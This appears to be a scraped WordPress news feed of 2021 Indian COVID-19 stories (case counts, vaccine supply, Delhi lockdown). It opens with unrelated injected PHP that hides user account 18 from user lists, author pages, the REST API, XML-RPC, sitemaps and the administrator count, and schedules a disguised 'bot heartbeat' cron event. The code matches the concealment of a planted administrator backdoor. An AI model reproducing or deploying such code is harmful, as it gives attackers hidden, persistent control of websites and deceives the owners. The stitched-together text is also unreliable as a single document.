add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Biggest Daily Rise (47,092) In Covid Cases In 2 Months Amid Kerala Surge appeared first on The Edge Media.
]]>Kerala contributed 32,803 cases or nearly 70 per cent of new cases and a third of deaths. The total number of those affected in the state by the viral infection now stands at 40,90,036. The test positivity rate was reported at 18.76 and with 173 deaths, the number of fatalities increased to 20,961, a state government release said
With over 85 per cent Covid patients in the southern state isolated at home, the Health Ministry has stressed on a “smart and strategic lockdown” to curb the daily surge, sources told NDTV. Kerala has not been following the Centre’s advice while reporting the highest daily cases in the country, officials insisted, adding that neighbouring states are feeling the impact.
The post Biggest Daily Rise (47,092) In Covid Cases In 2 Months Amid Kerala Surge appeared first on The Edge Media.
]]>The post RT-PCR Test A Must For Arrivals From 7 More Nations Amid New Strain Fear appeared first on The Edge Media.
]]>While earlier this rule was only applicable for arrivals from the UK, Europe and Middle East, seven more countries – South Africa, Bangladesh, Botswana, China, Mauritius, New Zealand, Zimbabwe – have been added to the list today, according to a latest guideline by Ministry of Health.
The new variant was first detected in South Africa in May. It has since been found in China, the Democratic Republic of the Congo, Mauritius, England, New Zealand, Portugal and Switzerland.
The post RT-PCR Test A Must For Arrivals From 7 More Nations Amid New Strain Fear appeared first on The Edge Media.
]]>The post Govt set for huge boost in COVID-19 vaccine supplies: J P Nadda appeared first on The Edge Media.
]]>Late last month, a senior government official told reporters that the government could only count on getting about 150 million doses in August.
Since then, India’s drug regulator has approved the Johnson & Johnson vaccine – though the company has not yet committed to a delivery schedule – and commercial production of Russia’s Sputnik V in India could start too.
Indian drugmaker Cadila Healthcare’s ZyCoV-D could also be approved soon, the health minister said this month.
Writing in a column, Jagat Prakash Nadda, president of the ruling Bharatiya Janata Party, credited Modi for making it easier for vaccine makers to get approval.
The post Govt set for huge boost in COVID-19 vaccine supplies: J P Nadda appeared first on The Edge Media.
]]>The post U.S. ships over 110 million COVID-19 vaccine doses abroad; India does not take any due to liability issues appeared first on The Edge Media.
]]>An Indian official involved in the vaccine negotiations told The Hindu that while U.S. donated vaccines could be accepted with an implicit indemnity cover from the government, several “challenges remain” in terms of resolving the larger issue of commercial orders for the three U.S. vaccine manufacturers (Pfizer, Moderna and Johnson & Johnson), and those are now holding up all COVID-19 vaccine imports from the U.S.
The post U.S. ships over 110 million COVID-19 vaccine doses abroad; India does not take any due to liability issues appeared first on The Edge Media.
]]>The post Covid Vaccine for Children likely by September : AIIMS Chief . appeared first on The Edge Media.
]]>“I think Zydus has already done the trials and they are waiting for the emergency authorisation. The Bharat Biotech’s Covaxin trails should be over August or September, and by that time we should get an approval. The Pfizer vaccine has already been approved by the FDA (US regulator- Food and Drug Administration).
Hopefully, by September , we should start vaccinating children, and that will be a big boost as far as breaking the chain of transmission is concerned,” Dr Guleria said.
The post Covid Vaccine for Children likely by September : AIIMS Chief . appeared first on The Edge Media.
]]>The post India surpasses 41 crore vaccines , 10 crore doses given in 24 days. appeared first on The Edge Media.
]]>On Monday, the Union ministry said that the cumulative Covid-19 vaccine doses administered in the country has surpassed 41 crore .
This signifies a major uptake from the first 10 crore doses that took 85 days to administer.
While the next 10 crore doses were administered in 45 days, almost half the time taken to give the first 10 crore doses, it was reduced further to 29 days taking the total count to 30 crore doses.
Health minister Mansikh Mandaviya tweeted on Monday attributing the feat to the “vaccine for all , free vaccine” campaign.
The post India surpasses 41 crore vaccines , 10 crore doses given in 24 days. appeared first on The Edge Media.
]]>The post France allows visitors with Indian-made AstraZeneca vaccine. appeared first on The Edge Media.
]]>The move to accept visitors vaccinated with AstraZeneca’s vaccine made by India’s Serum Institute came after a global outcry over the fact that the European Union’s Covid-19 certificate only recognises AstraZeneca vaccines manufactured in Europe.
At the same time, France is tightening border checks to control the spread of the delta variant and protect hospitals, according to a statement from the Prime Minister on saturday.
France still doest recognise vaccinations by Chinese or Russian vaccines, only those authorised by the EU drug regulator.
The post France allows visitors with Indian-made AstraZeneca vaccine. appeared first on The Edge Media.
]]>The post Will Delhi Extend Lockdown By Another Week or Will Restrictions be Lifted? Kejriwal Government Likely To Decide Today appeared first on The Edge Media.
]]>
New Delhi: Chief Minister Arvind Kejriwal is expected to take a final call on the extension of lockdown on Sunday. While the total shutdown in the national capital is scheduled to end on Monday (May 17), reports claimed that the Aam Aadmi Party government in Delhi might extend the lockdown by another week, i.e, May 24, despite the steep drop in the coronavirus cases and positivity rate.
On April 19, CM Kejriwal had announced a six-day lockdown to break the chain of the coronavirus infection and boost the health system that was about to collapse. The shutdown was later extended thrice to bring the situation under control. Last week Kejriwal extended the lockdown till May 17, saying that any leniency would squander the gains achieved so far in the current wave of the pandemic. The AAP govt had imposed strict measures like suspension of Metro trains and prohibition of wedding ceremonies at public venues.
Earlier, National Delhi Traders Association (NDTA) had requested Kejriwal to lift the lockdown and open markets in a phased manner ‘with strict enforcement of laws’. Speaking to PTI, National Delhi Traders Association (NDTA) president Atul Bhargava said that nobody was in favour of the lockdown since the beginning. “But they had no option since the coronavirus cases in Delhi were rising. However, now we are of the opinion that the government instead of extending lockdown should open the markets in a phased manner with strict enforcement of laws and proper sanitisation”, he added.
The post Will Delhi Extend Lockdown By Another Week or Will Restrictions be Lifted? Kejriwal Government Likely To Decide Today appeared first on The Edge Media.
]]>The post India records over 3.11 lakh new COVID-19 cases, 4,077 deaths in last 24 hours appeared first on The Edge Media.
]]>
The post India records over 3.11 lakh new COVID-19 cases, 4,077 deaths in last 24 hours appeared first on The Edge Media.
]]>The post Delhi’s Iconic Ram Leela Maidan Turns Into 500-ICU Bed Facility appeared first on The Edge Media.
]]>A temporary 500-ICU bed facility has been set up at Delhi’s iconic Ram Leela Maidan to help accommodate critically ill Covid patients hit hard by the virulent second wave of infections. The massive facility was set up in just 15 days, said Chief Minister Arvind Kejriwal.
Starting Saturday, the hospital will be functional with 250 beds; the rest will be operational two days later, said Mr Kejriwal after visiting the facility today.
“I salute our docs, engineers and workers who worked round the clock on war footing and constructed these 500 ICU beds in just 15 days at Ramlila maidan opp LNJP hospital. 250 ICU beds start tomo and 250 in next two days.
The city recorded 8,500 fresh COVID-19 cases in the past 24 hours, the first time the figure has dipped below 10,000 since April 10. The city’s test positivity rate has also dipped to 12 per cent, Mr Kejriwal said during a digital press conference.
Around 3,000 beds have cleared up in the past 10 days, he said, indicating that the second wave was easing in the city.
He said, however, that the number of patients in critical condition remains considerable because the ICU beds have not been freed up much.
The post Delhi’s Iconic Ram Leela Maidan Turns Into 500-ICU Bed Facility appeared first on The Edge Media.
]]>